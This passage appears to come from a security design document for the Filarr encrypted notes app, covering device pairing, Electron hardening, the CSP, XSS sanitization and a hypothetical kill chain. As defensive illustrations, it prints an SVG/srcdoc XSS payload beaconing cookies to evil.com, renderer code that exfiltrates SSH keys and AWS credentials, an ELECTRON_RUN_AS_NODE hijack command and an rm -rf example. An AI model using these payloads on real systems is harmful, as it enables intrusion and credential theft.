│ │ pubB: base64 │
│ │ } │
│ 10. Poll /pairing/<code> │ │
│ → receives pubB │ │
│ 11. sharedBits = │ │
│ ECDH(privA, pubB) │ │
│ 12. wrapKey = HKDF(...) │ │
│ (identical to B) │ │
│ 13. iv = random(12) │ │
│ 14. wrappedFEK = │ │
│ AES-256-GCM.wrap( │ │
│ fek, wrapKey, iv │ │
│ ) │ │
│ 15. PUT /pairing/<code>/ │ │
│ wrapped-fek { │ │
│ blob: base64( │ │
│ iv ++ wrappedFEK │ │
│ ) │ │
│ } │ │
│ │ 16. Poll /pairing/<code> │
│ │ → receives blob │
│ │ 17. fek = AES-256-GCM │
│ │ .unwrap(blob, wrapKey) │
│ │ 18. Store fek via │
│ │ safeStorage OS │
│ │ 19. DELETE /pairing/<code> │
└─────────────────────────────┴─────────────────────────────┘
What the Filarr server sees transiting through this protocol is limited to public elements: Device A's public key (pubA, a P-256 curve point that reveals nothing about the private key by the very definition of the ECDLP — Elliptic Curve Discrete Logarithm Problem), Device B's public key symmetrically, the 6-digit pairing code, and an opaque blob iv ++ wrappedFEK. This blob is encrypted by a key the server cannot reconstruct, because that would require knowing either privA or privB, ephemeral private keys that never leave the devices. Even an actively malicious server trying to man-in-the-middle the exchange would fail: both devices independently compute their sharedBits from their own private key and the received public key, and obtain the same result only if both public keys are actually those of the two legitimate devices.
7.2 HKDF extract-expand and why it had to be added in v2.2.2
Before v2.2.2, the code used the raw 256 bits returned by crypto.subtle.deriveBits() directly as the AES-256 key to wrap the FEK. It works in practice — the 256 bits are random in the curve group — but it technically violates the formal assumptions under which AES-GCM is proven secure.
The subtle problem is that bits from an ECDH point aren't uniformly distributed in {0, 1}^256. They're random within the group — that is, they represent a random point on the elliptic curve — but the curve's structure means some 256-bit sequences correspond to no valid point, while others are more frequent. This non-uniformity isn't naked-eye visible (coordinates look like noise), but it's statistically measurable and, more importantly, breaks the AES-GCM security proof that assumes uniformly random keys in {0, 1}^256.
The standard response to this problem is HKDF (RFC 5869), a two-step construction that transforms any sufficiently entropic source into a uniformly distributed key. The first step, Extract, computes PRK = HMAC-SHA-256(salt, ikm) where ikm is the input keying material (ECDH sharedBits in our case). The PRK result is a concentrated pseudo-random key, uniformly distributed in {0, 1}^256. The second step, Expand, derives the output key(s) via OKM = HMAC-SHA-256(PRK, info || 0x01). This two-phase separation is formally analyzed: it proves that an adversary observing OKM cannot distinguish the output distribution from a truly random uniform distribution, even having access to ikm (under reasonable assumptions on HMAC).
Adding HKDF in Filarr v2.2.2 was defense-in-depth hardening: in practice, no known attack exploited the non-uniformity of ECDH bits against AES-GCM in 2026, but respecting formal assumptions guarantees we won't be caught off guard if an academic paper tomorrow publishes a new attack exploiting this non-uniformity.
7.3 The domain separator, belt and suspenders
HKDF's info field, which we fixed to the literal string "filarr.pairing.wrap.v1", isn't cosmetic. It serves an important function called domain separation: guaranteeing that the same entropy source (sharedBits) will never produce the same derived key for two different uses, even when using the same algorithm (HKDF-SHA-256 here).
Imagine we add a new feature tomorrow: signing sync manifests with a key derived from the pairing ECDH exchange. If we used HKDF with the same info parameter, the signing key would be identical to the wrap key, creating a hidden dependency between two distinct cryptographic primitives. An attack on one (for example, a signing key leak via side-channel) would compromise the other. With different info per use ("filarr.pairing.wrap.v1" vs "filarr.pairing.sign.v1"), derived keys are independent under HKDF assumptions, even if starting from the same sharedBits. It's the pattern recommended by NIST SP 800-56C for all key derivation uses from a shared secret.
The v1 suffix in the label is also intentional: if we change the wrap algorithm (e.g., switching to ChaCha20-Poly1305), we'll move to v2, guaranteeing that a blob encrypted with the old version isn't accidentally interpreted as a new format.
7.4 The 6-digit code and its security
The 6-digit code offers about 20 bits of entropy, or 1,048,576 possible combinations. One might worry that an attacker could bruteforce the /pairing/<code> API to guess the code and intercept the encrypted blob. Several layered defenses make this attack non-viable.
First, the code has a 5-minute TTL server-side: past this delay, the entry is deleted and the code no longer corresponds to anything. The attacker therefore has only 5 minutes to bruteforce. Next, the server applies a rate limit on /pairing/<code> accesses: typically 10 attempts per minute per IP, with progressive blocking beyond. In 5 minutes, an attacker can thus test at most ~50 codes. Over 10^6 possibilities, that's a 0.005% probability of hitting the right code. Mathematically negligible, but combine it with the fact that the attacker would also need to guess the code at the exact moment it's valid, adding a temporal dimension to the problem.
Finally, and most importantly, the code is transmitted out of band: it's displayed on Device A's screen and typed by hand on Device B. It's never sent to the server that issues it — Device A's client generates the code locally via crypto.randomInt() and declares it to the server, and Device B receives it directly from the physical user. An attacker listening to the network never sees the code in cleartext.
To complete the picture, ECDH additionally provides forward secrecy: privA and privB private keys are ephemeral and deleted after pairing. If an attacker obtains the code after its expiration, or even if they compromise the server later, they can no longer reconstruct the wrap key because the private keys no longer exist.
7.5 Comparison with Signal's approach
A reader familiar with Signal might wonder why Filarr doesn't use Signal's Safety Numbers for verification. The answer lies in the different use case.
Signal uses 60-digit fingerprints derived from the two contacts' persistent public keys, compared visually or by scanning a QR code. This model is suited to persistent messaging: once Alice has added Bob to her contacts and verified his Safety Number, she can message him for years without re-verification, as long as Bob doesn't switch devices. But the initial cost is a 60-digit comparison, which is OK for a friend you're going to see in person but heavy for one-shot self-pairing.
The Filarr model, closer to Apple Continuity / Handoff or the WireGuard PSK + key exchange approach, uses a short one-time code. It's less secure in absolute terms (20 bits vs ~200 bits for a full Safety Number), but suited to the rare use case of adding a new device to your own account, with a physical trust channel (the user reads the code on one screen and types it on another).
8. Electron hardening
Electron is a framework that combines two potentially dangerous components: Chromium, which exposes the entire modern web attack surface (XSS, CSRF, DOM clobbering, prototype pollution...), and Node.js, which allows full system access (filesystem, processes, network, shell commands). By default, an Electron app doing nothing special exposes this explosive combination to code loaded in the renderer. If an attacker succeeds with an XSS, they can directly call require('child_process').exec('rm -rf /') and it's game over. All Filarr application security rests on breaking this chain architecturally: the renderer cannot access the system directly, it goes through strictly typed and allowlisted IPC channels.
8.1 The three fundamental isolations
The minimal configuration for a modern Electron app to be defensible is to enable three flags together in webPreferences:
webPreferences: {
nodeIntegration: false, // No require() in the renderer
contextIsolation: true, // contextBridge isolates preload from renderer
sandbox: true, // Renderer runs in Chromium sandbox
preload: path.join(__dirname, 'preload.js'),
}
Without these three flags, all other security measures are cosmetic. Each deserves explanation.
nodeIntegration: false guarantees that JavaScript code loaded in the renderer has no access to require(), process, global, or other Node.js globals. The renderer is in the same state as a standard Chrome tab: it can manipulate the DOM and call Web APIs (fetch, localStorage, crypto.subtle, etc.) but cannot read a local file or spawn a process. Without this flag, any XSS in a frontend dependency becomes a full RCE (Remote Code Execution), because the attacker can do require('fs').readFileSync('/etc/passwd').
contextIsolation: true goes further: it places preload code in a V8 realm separate from page code. Even if the preload needs ipcRenderer (to expose methods to the renderer via contextBridge), this module isn't accessible from the page. Both realms share the DOM but not JavaScript globals. Concretely, if an attacker does prototype pollution in the page realm (modifying Array.prototype for example), it doesn't touch the preload. Without contextIsolation, the contextBridge bridge is just syntactic sugar and exposed objects can be subverted by the page.
sandbox: true places the renderer process in the Chromium sandbox, an OS-level isolation mechanism Google has developed and hardened since 2008 to block escapes. Implementation differs by OS but the principle is the same: the renderer process can only talk to the rest of the system through an IPC channel with the main process (Chromium's browser process). On Windows, the sandbox uses a mix of Restricted Token (dropping admin privileges and specific tokens like SeTcbPrivilege), Job object (limiting resources), and Windows Integrity Level Low (preventing the process from writing to system areas). On macOS, it's Seatbelt, derived from sandbox-exec with a Chromium-specific profile listing allowed syscalls. On Linux, it's a combination of user namespaces (giving the process the illusion of being root while confined), seccomp-bpf (whitelist-ing syscalls at kernel level), and chroot (restricting filesystem view). A well-configured sandbox blocks in practice syscalls like mount, ptrace, kexec_load, and most operations that would allow an attacker to escape the process.
8.2 Electron fuses — binary-level integrity
"Fuses" (@electron/fuses) are a relatively recent and little-known mechanism: configuration bits flipped directly in the Electron binary at packaging time, which can no longer be modified in production without recompiling the application. They close Electron runtime default behaviors that were useful in development but dangerous in production.
Since v2.2.2, Filarr applies 8 explicit fuses with the strictlyRequireAllFuses: true parameter. This parameter forces listing all known fuses of the Electron version used; if a future Electron version adds a new fuse with an insecure default, the build will fail and force an explicit decision. It's fail-closed applied to security configuration.
| Fuse | Value | What it blocks |
|---|---|---|
RunAsNode | false | ELECTRON_RUN_AS_NODE=1 filarr.exe ./evil.js — turning Filarr into an arbitrary Node runtime for user code |
EnableCookieEncryption | true | Cookies encrypted via DPAPI/Keychain/libsecret — an attacker reading the Cookies SQLite file can't extract cleartext tokens |
EnableNodeOptionsEnvironmentVariable | false | NODE_OPTIONS=--require=/tmp/evil.js filarr.exe — Node module injection at launch |
EnableNodeCliInspectArguments | false | --inspect, --inspect-brk — a debug port on a prod binary = RCE |
EnableEmbeddedAsarIntegrityValidation | true | Cryptographic integrity validation of app.asar (macOS + Windows) — the app refuses to start if malware patched the JS on disk |
OnlyLoadAppFromAsar | true | Refuses to load from an unpacked directory next to the binary — classic persistence vector |
LoadBrowserProcessSpecificV8Snapshot | false | Default behavior (no separate snapshot) |
GrantFileProtocolExtraPrivileges | true | Kept for file:// compat in prod — TODO v2.3: migrate to custom app:// and set to false |
A revealing anecdote occurred during the Electron 41 upgrade smoke test in v2.3.0. Running npm start for the first time after the upgrade, the app refused to launch with a cryptic error: TypeError: Cannot read properties of undefined (reading 'isPackaged') on the line const isDev = !electron_1.app.isPackaged. After investigation, the cause was that an environment variable ELECTRON_RUN_AS_NODE=1 was lingering in the dev shell (set by an internal tool for another project), and it was forcing Electron to run as a plain Node.js runtime rather than as an Electron app. require('electron') therefore returned the binary path rather than the API namespace. This dev bug had no consequences, but it perfectly illustrated the attack scenario the RunAsNode: false fuse targets: in production, a local attacker with user-level access to the machine could set ELECTRON_RUN_AS_NODE=1 in the environment and launch filarr.exe ./malicious_script.js to execute arbitrary code with the user's privileges, using our own signed binary as a vector. The fuse neutralizes this variable in the final binary: even if defined, Electron ignores it and starts in app mode. This fortuitous validation reassured us that the defense works.
8.3 IPC allowlist and preload
The preload (electron/preload.ts) is the only place where Node.js code runs with access to contextBridge and ipcRenderer. Its role is to expose to the renderer a minimal API, via contextBridge.exposeInMainWorld('electron', { ... }), containing only methods necessary for app operation. The renderer cannot access ipcRenderer directly, cannot call require(), cannot touch process or global. Each exposed method corresponds to a typed IPC channel, handled on the main process side with strict argument validation.
To illustrate the difference between vulnerable and hardened versions, here's the import:readFile handler before and after v2.2.1:
// BEFORE v2.2.1 — vulnerable to path traversal
ipcMain.handle('import:readFile', async (_e, filePath: string) => {
return fs.readFile(filePath, 'utf-8');
});
// AFTER v2.2.1 — path whitelist
const approvedImportPaths = new Set<string>();
ipcMain.handle('import:selectFile', async () => {
const { canceled, filePaths } = await dialog.showOpenDialog(...);
if (canceled) return null;
approvedImportPaths.add(path.resolve(filePaths[0]));
return filePaths[0];
});
ipcMain.handle('import:readFile', async (_e, filePath: string) => {
if (!isApprovedPath(filePath)) return null; // ← blocked
const lstat = await fs.lstat(filePath);
if (lstat.isSymbolicLink()) return null; // ← symlink escape blocked
return fs.readFile(filePath, 'utf-8');
});
The difference is fundamental: in the vulnerable version, an XSS in the renderer could call invoke('import:readFile', '/home/victim/.ssh/id_rsa') and exfiltrate the SSH key. In the hardened version, only paths the user has explicitly chosen via a native dialog are accepted. The renderer has no way to trigger a dialog opening without user interaction (there's no IPC for that), so it cannot populate the whitelist with paths it chooses. Symlinks are also rejected to prevent an imported ZIP from containing a symbolic link pointing to /etc/passwd which would then be read by Filarr at extraction time.
Other handlers have been hardened similarly. vault:importZip received a cap of 500 MB total decompressed, 50 MB per entry, 10,000 entries maximum, and rejects paths containing .. or absolute paths — these caps protect against ZIP bombs (archives decompressing to several gigabytes) and ZIP slip attacks (entries with paths escaping the destination folder). open-external now uses a strict new URL(url) that rejects any scheme other than http: and https:, ASCII control characters, and URLs over 8 KB. This last check is applied including to URLs returned by our own backend for Stripe checkouts, as defense-in-depth against a compromised backend trying to force opening a javascript: or file: URL.
8.4 Permission handlers
Modern Web APIs include an impressive number of sensitive permissions: camera, microphone, geolocation, USB, MIDI, Bluetooth, serial port, HID, screen capture, background sync access, and others more obscure. By default, Electron asks the user for confirmation when a page requests one of these permissions. Filarr goes further and explicitly refuses all these permissions by defining a strict handler:
mainWindow.webContents.session.setPermissionRequestHandler(
(_, permission, callback) => {
const allowed = ['clipboard-read', 'clipboard-sanitized-write', 'notifications'];
callback(allowed.includes(permission));
}
);
Only three permissions are allowed: reading clipboard (to paste text), writing to clipboard in sanitized fashion (to copy text, never rich HTML that could be dangerous), and displaying desktop notifications (for reminders). Everything else is silently refused. Even if an XSS tried to call navigator.mediaDevices.getUserMedia() to access the webcam, the call would immediately return an error without user prompt.
8.5 SSRF protection
When Filarr displays link previews in notes (via fetchPageTitle and fetchPageMetadata IPC handlers), it must make HTTP requests to user-cited URLs. It's a classic SSRF (Server-Side Request Forgery) attack surface: an attacker could place in a shared note a link like http://169.254.169.254/latest/meta-data/iam/security-credentials/ which, if fetched from an AWS machine, would return the instance's temporary IAM credentials. This isn't hypothetical: it's exactly the mechanism of CVE-2019-8451 at Jira, where the link preview feature allowed exfiltrating IAM credentials from the Jira server.
Filarr implements an isPrivateOrReservedUrl() helper that blocks all internal targets before making the request: localhost, 127.0.0.1, [::1], 0.0.0.0, RFC 1918 private ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), IPv4 and IPv6 link-local (including therefore 169.254.169.254 and its variants), and IPv6 unique-local. A request to a blocked target immediately returns an error. This list is maintained as new cloud metadata ranges appear (AWS, GCP, Azure, DigitalOcean all have their own metadata IPs, generally in 169.254.0.0/16).
9. Content Security Policy
The Content Security Policy is the last rampart if everything else fails. Filarr applies a strict CSP on all responses served to the renderer, via an onHeadersReceived handler that injects headers into the Chromium session:
default-src 'self';
script-src 'self' https://cdnjs.cloudflare.com;
style-src 'self' 'unsafe-inline';
img-src 'self' data: blob:;
font-src 'self' data: blob: *;
connect-src 'self' https://*.filarr-app.workers.dev
https://api.filarr.com
https://*.ingest.de.sentry.io;
worker-src 'self' blob: https://cdnjs.cloudflare.com;
frame-src https://www.youtube-nocookie.com https://www.youtube.com
https://player.vimeo.com;
object-src 'none';
base-uri 'self';
form-action 'self';
frame-ancestors 'none';
Beyond CSP, we systematically apply X-Content-Type-Options: nosniff (preventing abusive MIME sniffing), X-Frame-Options: DENY (blocking embedding in external iframes), Referrer-Policy: strict-origin-when-cross-origin (limiting URL leakage in Referer headers), Permissions-Policy: camera=(), microphone=(), geolocation=(), usb=() (permission handler backup for user agents that still respect this header), and Strict-Transport-Security: max-age=31536000; includeSubDomains (enabling HSTS across the entire Filarr domain family).
Two concessions in this config deserve documentation because they contravene the "block everything by default" principle. First, 'unsafe-inline' on style-src is required by React inline style attributes — React generates inline CSS for its components, and moving to a nonce-based solution would break the entire rendering pipeline. This concession is mitigated by the contextIsolation + sandbox + DOMPurify combination: even if an attacker injects malicious CSS, they can't execute JavaScript via this path. Next, script-src authorizes cdnjs.cloudflare.com in addition to 'self' because KaTeX and Mermaid are loaded from cdnjs to reduce bundle size. We could bundle everything locally (and it's on the roadmap), but the current tradeoff is accepting a single trusted third-party domain in exchange for a 500 KB smaller bundle.
The object-src 'none' header eliminates all legacy plugin attack surface (Flash, ActiveX, Java Applet), which no modern app should allow. The frame-ancestors 'none' header prevents Filarr from being embedded in an iframe by an external site, blocking clickjacking attacks.
10. XSS sanitization
All HTML ending up inserted into the renderer DOM goes through DOMPurify 3.4.0+, the open-source reference in the field maintained by Cure53. The defensive configuration was widened in v2.2.1 based on the security audit:
DOMPurify.sanitize(html, {
ADD_ATTR: ['target', 'rel'],
FORBID_TAGS: [
'style', 'form', 'input', 'textarea', 'select',
'iframe', 'object', 'embed',
'svg', 'math', 'foreignObject', 'annotation-xml',
'base', 'meta', 'link',
],
FORBID_ATTR: ['style', 'srcdoc', 'formaction', 'ping'],
ALLOWED_URI_REGEXP: /^(?:(?:https?|mailto|tel):|...)/i,
});
Why forbid <svg> when SVG seems a priori harmless as an image format? Because SVG is a classic Trojan horse for bypassing naive sanitizers. The <foreignObject> tag inside an SVG allows embedding arbitrary HTML, including <iframe> with srcdoc attribute, <script>, or event handlers like onclick. A sanitizer blocking <iframe> but allowing <svg> would let through:
<svg>
<foreignObject>
<iframe srcdoc="<script>fetch('/api/exfil?cookie='+document.cookie)</script>">
</iframe>
</foreignObject>
</svg>
Historically, DOMPurify itself has had several CVEs around SVG and MathML (the MathML 3.0 version is full of similar surprises). Version 3.4.0 fixes all known bypasses, but the defensive blocklist as complement remains a belt and suspenders: if a new bypass is discovered tomorrow in a 3.5 version, our blocklist still blocks the vector.
The forbidden attributes srcdoc, formaction and ping are all lesser-known but very real attack vectors. srcdoc allows executing inline HTML in an iframe, bypassing CSP restrictions targeting the src attribute. formaction allows a form button to redirect submission to a different URL than the one specified by the <form>, letting an attacker exfiltrate data via an innocent form. ping allows an <a> link to send a silent POST to an arbitrary URL when the user clicks — a feature destined for analytics tracking but usable to exfiltrate data. Blocking these three attributes costs zero legitimate functionality in the Filarr context.
Beyond DOMPurify, Filarr applies validations specific to certain content types. Wiki-links [[Note]] imported from an Obsidian vault are validated as pointing only to existing note titles, never interpreted as URLs. An attacker who sneaked [[javascript:alert(1)]] into a shared vault would see their link rendered as plain text (because no note is named javascript:alert(1)) rather than as a clickable link with the javascript: scheme. Mermaid diagrams are rendered with the securityLevel: 'strict' option, which disables HTML execution in labels, click handlers, and inline scripts generated by the parser — three vectors that have all had historical CVEs in Mermaid.
11. Anatomy of a kill chain
To understand how defenses chain together, nothing beats a concrete case. Here's what a determined attacker could do against Filarr v2.2.0, and what blocks each step in the current v2.3.1 version. The scenario is inspired by real attacks against other Electron apps and represents a plausible supply chain + XSS model.
11.1 The scenario
An attacker publishes a popular "Obsidian plugin" called Awesome Tag Cloud v2 on an Obsidian vault-sharing community. The plugin looks legitimate: it generates nice tag clouds. But its README.md file contains an HTML tag crafted by the attacker, designed to trigger an exploitation cascade when the vault is imported into Filarr via the import wizard.
The target user downloads this booby-trapped vault, opens it in Filarr, and launches the Obsidian → Filarr import wizard. At the moment the README note is rendered in the editor, the payload activates.
11.2 Phase 1 — Initial Access (T1189)
In the version prior to v2.2.1, the DOMPurify configuration didn't include svg or foreignObject in the blocklist. The attacker's payload could therefore inject a block:
<svg><foreignObject>
<iframe srcdoc="<script>fetch('https://evil.com/beacon?u='+encodeURIComponent(document.cookie))</script>"></iframe>
</foreignObject></svg>
DOMPurify let it through (because <svg> was allowed), the iframe loaded, its srcdoc executed the script, and phase 1 succeeded: the attacker had JavaScript running in the Filarr renderer context.
In v2.2.1 and later, FORBID_TAGS includes svg, foreignObject, iframe, and srcdoc is in FORBID_ATTR. DOMPurify entirely removes the block before DOM insertion. The payload no longer has an HTML injection vector. Phase 1 fails.
11.3 Phase 2 — Privilege Escalation via IPC (T1068)
Suppose phase 1 succeeded despite everything, via a future 0-day undiscovered in DOMPurify that would pass all filters. The attacker now has JavaScript in the renderer. Their objective: exfiltrate your private SSH key to use it from there.
In the version prior to v2.2.1, the attacker simply wrote:
const sshKey = await window.electron.ipcRenderer.invoke(
'import:readFile',
'C:\\Users\\Victim\\.ssh\\id_ed25519'
);
const awsCreds = await window.electron.ipcRenderer.invoke(
'import:readDirectory',
'C:\\Users\\Victim\\.aws'
);
fetch('https://evil.com/collect', {
method: 'POST',
body: JSON.stringify({ sshKey, awsCreds })
});
The main process executed the IPC without any path validation. The SSH key went, AWS credentials went, .env from all openable projects went, .git/config history potentially containing GitHub tokens went. All without a single UAC prompt, no visible notification for the user, no alert log — because the IPC handler treated the operation as perfectly legitimate.
In v2.2.1, the import:readFile handler now verifies that the requested path is part of approvedImportPaths, a Set only populated by native showOpenDialog dialogs. The attacker, in the renderer, has no way to trigger a native dialog — there's no exposed dialog:open IPC that opens without user UI. Their attempt to read id_ed25519 returns null, and a warning is logged on the main side: [import:readFile] Refused unapproved path: C:\Users\Victim\.ssh\id_ed25519. Phase 2 fails.
11.4 Phase 3 — Persistence (T1546)
A sophisticated attacker doesn't stop at one-shot exfiltration; they want to survive a security update that would patch the initial vulnerability. The Service Worker is an ideal tool for this: once registered, it intercepts all fetch() requests from the app and can inject its code at each page load, even after the user received and installed a patch.
In the version prior to v2.2.1, Filarr inherited a serviceWorkerRegistration.register() from the create-react-app template. An attacker could register their own malicious SW:
await navigator.serviceWorker.register('/stolen-sw.js');
And from there, the SW would persist between sessions, survive updates (because the SW is stored in Electron's Chromium profile, not in app.asar), and reinject its payload at each load. Neutralizing this kind of persistence would require the user to completely uninstall the app and manually delete their profile — an operation few users know how to do.
Version v2.2.1 fixes this radically: src/index.js explicitly calls serviceWorkerRegistration.unregister() at startup, and purges all Cache Storage with caches.keys().then(keys => Promise.all(keys.map(k => caches.delete(k)))). If an SW inherited from v2.1.x was present, it's unregistered at the first v2.2.1+ launch. The attacker can no longer establish persistence via this path.
11.5 Phase 4 — Command & Control
An attacker who has established persistence then wants to maintain a communication channel with their C2 (command and control) infrastructure. A subtle approach is to disguise requests as external link openings, which seem legitimate — a user clicking a link in a note expects the browser to open.
In the version prior to v2.2.1, the open-external IPC was guarded by a simple startsWith('https://'). The attacker could therefore construct a URL like https://filarr.com#javascript:window.open('https://evil.com/c2') that passed the check but whose fragment was interpreted differently by some native apps associated with the scheme, potentially opening an attack surface.
Version v2.2.1 uses strict new URL(url) that parses the full URL and rejects any protocol other than http: / https:, ASCII control characters, and excessively long URLs (over 8 KB, a threshold beyond which most OS parsers have exploitable bugs). The same validation is applied to URLs returned by the backend for Stripe checkouts, as defense-in-depth against a compromised backend trying to push a javascript: URL.
11.6 Phase 5 — Native privilege abuse
Final scenario, suppose an attacker who already has user-level local access to the machine (without XSS), perhaps via a trojan downloaded elsewhere. They want to use the signed Filarr binary as a proxy to execute their code and escape heuristic detections.
ELECTRON_RUN_AS_NODE=1 "C:\Program Files\Filarr\Filarr.exe" ./payload.js
Before v2.2.2, not all fuses were applied (and before, none at all). This command line would transform Filarr into a Node.js runtime and execute payload.js with the user's privileges. From the system's view (and EDR's), it's Filarr doing a network operation, not a suspicious executable — so the code is less likely to be blocked.
In v2.2.2+, the RunAsNode: false fuse is flipped in the binary. The ELECTRON_RUN_AS_NODE environment variable is purely ignored. Same for NODE_OPTIONS, --inspect, --inspect-brk. The attacker can no longer hijack the binary as a proxy.
11.7 The overall result
To compromise a Filarr v2.3.1 user via the described scenario, the attacker would need simultaneously: a 0-day in DOMPurify 3.4+ (none public in 2026) to inject JS, a 0-day in Electron 41 (patches up to date) to escape the Chromium sandbox, a flaw in a specific IPC handler (each handler validated by audit), and a persistence method bypassing SW, env vars, and ASAR patch. That's a five-link chain, each link requiring an independent 0-day vulnerability. This is precisely defense-in-depth's objective: stack enough independent layers that no isolated break compromises the whole.
12. Supply chain
npm supply chain attacks have become the norm in recent years. It's instructive to walk through the main incidents to understand the form these attacks take in practice and what Filarr does to reduce its exposure.
The event-stream incident of 2018 is emblematic. The historical package maintainer, Dominic Tarr, accepted adding a contributor who offered to help with maintenance. This contributor eventually became the main maintainer after Tarr disengaged, and they then published a version including malicious code specifically targeting the copay-dash wallet used by Copay, a Bitcoin wallet application. The malware stole private keys and wallet balances using it. The event-stream package had about 2 million downloads per week at the time — virtually every Node.js project used it transitively. Dominic Tarr's post-mortem is an enlightening read on open source maintenance dynamics and the risks of default hospitality.
The ua-parser-js incident of 2021 was more direct: the maintainer's npm account was compromised via credential stuffing (password reuse from another leak), and three malicious versions were published within hours. They contained an XMRig crypto miner and a credential stealer targeting environment variables containing tokens. The package had 7 million downloads per week. Recovery took several days of coordination between GitHub, npm, and the maintainer who had to regain control of their account and publish clean versions. The advisory details the timeline.
The node-ipc incident of 2022 introduced a new concept: "protestware". The maintainer, RIAEvangelist, voluntarily added in an update code that overwrote files on machines whose IP was geolocated in Russia or Belarus, in protest of the invasion of Ukraine. The package was used by Vue.js and other major projects. Beyond the ethical debate on the legitimacy of the act, the incident reminded that any malicious maintainer has the technical capacity to introduce any code into any dependency, and that the open source community has no systemic mechanism to prevent it. Detailed Snyk post-mortem.
And also in 2022, colors.js and faker.js: maintainer Marak Squires published versions printing "LIBERTY LIBERTY LIBERTY" in an infinite loop, protesting maintaining an unpaid open source project used by multinationals. It wasn't exactly malware but self-inflicted denial of service — and it broke thousands of production applications for several hours. BleepingComputer article.
Facing this reality, Filarr adopts several risk reduction strategies without being able to claim immunity. The first is quarterly audit via npm audit --audit-level=high, automatically blocking in CI if a new high or critical vulnerability appears. This discipline led to the major upgrades documented in the changelog: jspdf (critical XSS), axios (SSRF + DoS), dompurify (sanitizer bypass), electron (18 CVEs).
The second strategy is the strict CSP that limits what a compromised dependency can do at runtime. Even if a package like @tiptap/extension-foo published a version tomorrow trying to load code from evil.com, script-src 'self' + cdnjs would block the request. It's not protection against statically injected code (which is part of the bundle), but it's a defense line against payloads attempting network exfiltration.
The third is binary integrity validation via Electron fuses. EnableEmbeddedAsarIntegrityValidation: true detects any app.asar modification after signing. An attacker who managed to patch the binary on disk (either via a local vulnerability or via a dependency writing to the install directory) fails at the next launch. OnlyLoadAppFromAsar: true also refuses to load from an app/ folder next to the binary — a classic persistence vector where malware drops a folder with modified code that would have priority over the ASAR.
The fourth strategy is simply limited dependency scope: we avoid packages with thousands of transitives. When we add a new dependency, I read the code (at least its entry point and the top of the main file) before integrating it. It's an artisanal measure that doesn't scale but makes a difference at small scale.
The honest limit, which must be acknowledged, is that none of these defenses fully protects against a compromised transitive dependency with a payload executing in the renderer. If @tiptap/extension-foo were compromised tomorrow and injected runtime JS, CSP would block external communication but not local execution or use of exposed IPCs (which are themselves validated, but an inventive payload could combine several handlers to reach its goal). The robust long-term answer requires reproducible builds (whose deterministic output allows anyone to verify that the final binary matches the published source code), regular and deep audits, and minimal renderer scope. It's on the roadmap for upcoming versions.
13. CVE history
As of April 18, 2026, in version 2.3.1, the state of the attack surface is as follows: zero critical vulnerabilities detected by npm audit, zero high vulnerabilities in direct runtime dependencies, and 47 transitive vulnerabilities all confined to react-scripts. This last point deserves clarification: react-scripts is the Create React App build toolbox (webpack, babel-loader, jest, postcss, etc.) used only at renderer build time. The vulnerabilities it drags (mainly old webpack-dev-server and svgo versions) don't affect the packaged application's runtime — they're in the developer build chain. We monitor them, document them, but don't consider them production risks.
Recent attack surface cleanup happened in four major steps documented here with GHSA references where applicable:
| Version | Upgrade | Major CVE fixed |
|---|---|---|
| v2.2.0 | jspdf 4.2.0 → 4.2.1 | GHSA-wfv2-pwc8-crg5 — critical XSS CVSS 9.6 (New Window HTML injection) |
| v2.2.0 | axios 1.7.7 → 1.15.0 | DoS via __proto__ in mergeConfig (GHSA-wf5p-g6vw-rhxx), SSRF via NO_PROXY, cloud metadata exfil via header injection |
| v2.2.0 | dompurify 3.3.1 → 3.4.0 | 5 sanitizer bypasses (mutation-XSS, ADD_ATTR/ADD_TAGS bypass of FORBID_TAGS, prototype pollution via USE_PROFILES, URI bypass) |
| v2.3.0 | electron 39 → 41 | 18 Electron CVEs — context isolation bypass via contextBridge VideoFrame, multiple use-after-free in offscreen paint / download dialog / PowerMonitor, path injection in setAsDefaultProtocolClient (Windows), USB device spoofing, renderer command-line switch injection, unquoted executable path in setLoginItemSettings (Windows), header injection in custom protocol handlers, and more |
| v2.3.0 | electron-builder 24 → 26 | Required by Electron 41 |
To these dependency upgrades are added the 8 internal v2.2.1 patches documented elsewhere: IPC path traversal, ZIP bomb, Math.random UUIDs, service worker disabled, timing attack on hash comparison, strict URL protocol check, widened DOMPurify FORBID_TAGS, safeStorage fail-closed. Each of these patches was identified during the full post-v2.2.0 audit and fixed within the following week.
14. Comparison with other tools
To place Filarr relative to tools it might be compared with in the encrypted productivity ecosystem, here's a synthetic table of each's cryptographic and architectural choices:
| Aspect | Filarr | Signal | 1Password | Bitwarden | Obsidian | Notion |
|---|---|---|---|---|---|---|
| Zero-knowledge storage | ✅ | ✅ | ✅ | ✅ | N/A (local only) | ❌ (servers read everything) |
| File encryption | AES-256-GCM | AES-256-CTR + HMAC-SHA256 | AES-256-GCM | AES-256-CBC + HMAC-SHA256 | ❌ (plain) | ❌ (plain server-side) |
| KDF | Argon2id + PBKDF2-SHA-512 (hybrid) | N/A (no password) | PBKDF2-SHA-256 + Secret Key | PBKDF2 → Argon2id (progressive) | N/A | Bcrypt server-side |
| Multi-device | ECDH + HKDF | Double Ratchet | 1Password Secret Key sync | Password + device key | Third-party sync (iCloud, paid Obsidian Sync) | Native cloud sync (non-E2E) |
| Local-first | ✅ | ❌ (servers for push) | ❌ (vault encrypted on server) | Partial | ✅ | ❌ |
| Open source | Partially (Electron app) | ✅ (server + clients) | ❌ | ✅ | ❌ (plugin ecosystem only) | ❌ |
| External audit | Planned | Trail of Bits, NCC, academic | Cure53 (2021, 2023) | Cure53 (2020, 2022), Insight Risk | ❌ | External (non-public) |
| Two-factor authentication (2FA) | ✅ TOTP + 8 backup codes | ✅ Registration Lock (PIN) | ✅ TOTP, FIDO2 | ✅ TOTP, FIDO2, YubiKey | ✅ (Obsidian Sync) | ✅ TOTP, WebAuthn |
Filarr positions itself in a specific market gap: between Obsidian, an excellent local-first tool that encrypts nothing by default and depends on third-party plugins for encryption, and Bitwarden, exemplary in zero-knowledge but exclusively dedicated to passwords. No other tool combines zero-knowledge, local-first, and full workspace (notes + files + graph + canvas). This niche was the reason to build Filarr rather than rely on an existing tool.
